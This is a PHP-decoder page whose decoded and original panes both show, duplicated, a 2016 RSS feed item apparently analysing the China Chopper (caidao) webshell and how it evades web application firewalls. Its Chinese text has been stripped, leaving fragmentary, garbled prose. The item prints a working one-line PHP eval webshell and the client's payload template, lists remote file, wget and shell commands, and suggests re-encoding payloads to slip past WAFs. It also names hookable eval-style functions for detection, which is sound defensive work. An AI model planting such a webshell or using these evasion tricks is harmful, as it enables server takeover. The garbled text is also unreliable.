Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?xml version="1.0" encoding="gbk" ?> <rss version="2.0"> <channel> <title>..
Decoded Output download
<?xml version="1.0" encoding="gbk" ?>
<rss version="2.0">
<channel>
<title> - CodeSec</title>
<link>http://www.codesec.net/feed_11.xml</link>
<description></description>
<copyright>Copyright(C) CodeSec.Net</copyright>
<generator>CodeSec.Net by CodeSecTeam.</generator>
<lastBuildDate>Thu, 28 Jul 2016 11:33:03 +0000</lastBuildDate>
<ttl>30</ttl>
<image>
<url>http://www.codesec.net//static/image/common/logo.png</url>
<title>CodeSec.Net</title>
<link>http://www.codesec.net/</link>
</image>
<item>
<title>20160620</title>
<link>http://www.codesec.net/view/431367.html</link>
<description>
<![CDATA[<p>617:</p>
<p> waf webshell </p>
<p> 6 </p>
<p> 6 20 maicaidao.com 660 +</p>
<br/><img src="http://www.codesec.net/app_attach/201606/21/20160621_267_431367_0.jpg" alt="20160620" /><br/>
<p></p>
<p>SPDDoS</p>
<p>whois(20141213)</p>
<br/><img src="http://www.codesec.net/app_attach/201606/21/20160621_267_431367_1.jpg" alt="20160620" /><br/>
<p>www.maicaidao.com</p>
<p>www.maicaidao.com</p>
<p> readme.txt</p>
<p>caidao.exe </p>
<p>db.mdb </p>
<p>caidao.conf </p>
<p>cache.tmp ()</p>
<p>readme.txt ()</p>
<p>ip.dat IPIP()</p>
<p>CCC ()</p>
<p>Customize ()</p>
<p> caidao.conf waf</p>
<p> waf waf</p>
<p>1. waf webshell ( waf)</p>
<p>2. waf</p>
<p>3. waf waf web </p>
<p> webshell AntSword(), nodejs ES6 Altman C++ github Java webshell Cknife</p>
<p> caidao.conf </p>
<br/><img src="http://www.codesec.net/app_attach/201606/21/20160621_267_431367_2.png" alt="20160620" /><br/>
caidao.conf
<p> waf </p>
<p>1. <FLAG></p>
<p> ->| |<-, waf ~>$</p>
<p>2. <UA></p>
<p> HTTP User-Agent caidao.conf UA UA, Google </p>
<p>3. <K1> <K2></p>
<p>POST, K1 z1K2 z2waf </p>
<p>4. <<a href="http://www.codesec.net/list/4/" target="_blank">php</a>_BASE>, <ASP_BASE>, <ASPX_BASE>, <PHP_BASE.></p>
<p>4 webshell </p>
<p> webshell </p>
<?php @eval(base64_decode($_POST['caidao']));?>
<p></p>
<PHP_BASE.>eval(base64_decode($_POST[id]));&id=%s</PHP_BASE.>
<p> waf waf </p>
<p> base64_decode hex, AES, DES waf waf </p>
<p>5. <GETBASEINFO></p>
<p> shell, </p>
<p>6. <SHOWFOLDER></p>
<p></p>
<p>7. <SHOWTXTFILE></p>
<p></p>
<p>8. <SAVETXTFILE></p>
<p></p>
<p>9. <DELETEFILE></p>
<p></p>
<p>10. <DOWNFILE></p>
<p></p>
<p>11. <UPLOADFILE></p>
<p></p>
<p>12. <PASTEFILE></p>
<p></p>
<p>13. <NEWFOLDER></p>
<p></p>
<p>14. <WGET></p>
<p></p>
<p>15. <SHELL></p>
<p></p>
<p></p>
WAF
<p> WAF </p>
<p> WAF </p>
<p>1. waf</p>
<p> waf base64 base64 , Request, <PHP_BASE> waf WAF xxx </p>
<p>2.hook waf</p>
<p> PHP eval, create_function, preg_replace, assert string API compile_string</p>
<p> waf hook API, APIDid this file decode correctly?
Original Code
<?xml version="1.0" encoding="gbk" ?>
<rss version="2.0">
<channel>
<title> - CodeSec</title>
<link>http://www.codesec.net/feed_11.xml</link>
<description></description>
<copyright>Copyright(C) CodeSec.Net</copyright>
<generator>CodeSec.Net by CodeSecTeam.</generator>
<lastBuildDate>Thu, 28 Jul 2016 11:33:03 +0000</lastBuildDate>
<ttl>30</ttl>
<image>
<url>http://www.codesec.net//static/image/common/logo.png</url>
<title>CodeSec.Net</title>
<link>http://www.codesec.net/</link>
</image>
<item>
<title>20160620</title>
<link>http://www.codesec.net/view/431367.html</link>
<description>
<![CDATA[<p>617:</p>
<p> waf webshell </p>
<p> 6 </p>
<p> 6 20 maicaidao.com 660 +</p>
<br/><img src="http://www.codesec.net/app_attach/201606/21/20160621_267_431367_0.jpg" alt="20160620" /><br/>
<p></p>
<p>SPDDoS</p>
<p>whois(20141213)</p>
<br/><img src="http://www.codesec.net/app_attach/201606/21/20160621_267_431367_1.jpg" alt="20160620" /><br/>
<p>www.maicaidao.com</p>
<p>www.maicaidao.com</p>
<p> readme.txt</p>
<p>caidao.exe </p>
<p>db.mdb </p>
<p>caidao.conf </p>
<p>cache.tmp ()</p>
<p>readme.txt ()</p>
<p>ip.dat IPIP()</p>
<p>CCC ()</p>
<p>Customize ()</p>
<p> caidao.conf waf</p>
<p> waf waf</p>
<p>1. waf webshell ( waf)</p>
<p>2. waf</p>
<p>3. waf waf web </p>
<p> webshell AntSword(), nodejs ES6 Altman C++ github Java webshell Cknife</p>
<p> caidao.conf </p>
<br/><img src="http://www.codesec.net/app_attach/201606/21/20160621_267_431367_2.png" alt="20160620" /><br/>
caidao.conf
<p> waf </p>
<p>1. <FLAG></p>
<p> ->| |<-, waf ~>$</p>
<p>2. <UA></p>
<p> HTTP User-Agent caidao.conf UA UA, Google </p>
<p>3. <K1> <K2></p>
<p>POST, K1 z1K2 z2waf </p>
<p>4. <<a href="http://www.codesec.net/list/4/" target="_blank">php</a>_BASE>, <ASP_BASE>, <ASPX_BASE>, <PHP_BASE.></p>
<p>4 webshell </p>
<p> webshell </p>
<?php @eval(base64_decode($_POST['caidao']));?>
<p></p>
<PHP_BASE.>eval(base64_decode($_POST[id]));&id=%s</PHP_BASE.>
<p> waf waf </p>
<p> base64_decode hex, AES, DES waf waf </p>
<p>5. <GETBASEINFO></p>
<p> shell, </p>
<p>6. <SHOWFOLDER></p>
<p></p>
<p>7. <SHOWTXTFILE></p>
<p></p>
<p>8. <SAVETXTFILE></p>
<p></p>
<p>9. <DELETEFILE></p>
<p></p>
<p>10. <DOWNFILE></p>
<p></p>
<p>11. <UPLOADFILE></p>
<p></p>
<p>12. <PASTEFILE></p>
<p></p>
<p>13. <NEWFOLDER></p>
<p></p>
<p>14. <WGET></p>
<p></p>
<p>15. <SHELL></p>
<p></p>
<p></p>
WAF
<p> WAF </p>
<p> WAF </p>
<p>1. waf</p>
<p> waf base64 base64 , Request, <PHP_BASE> waf WAF xxx </p>
<p>2.hook waf</p>
<p> PHP eval, create_function, preg_replace, assert string API compile_string</p>
<p> waf hook API, APIFunction Calls
| None |
Stats
| MD5 | e62472db98334275e56b76889b5bd823 |
| Eval Count | 0 |
| Decode Time | 82 ms |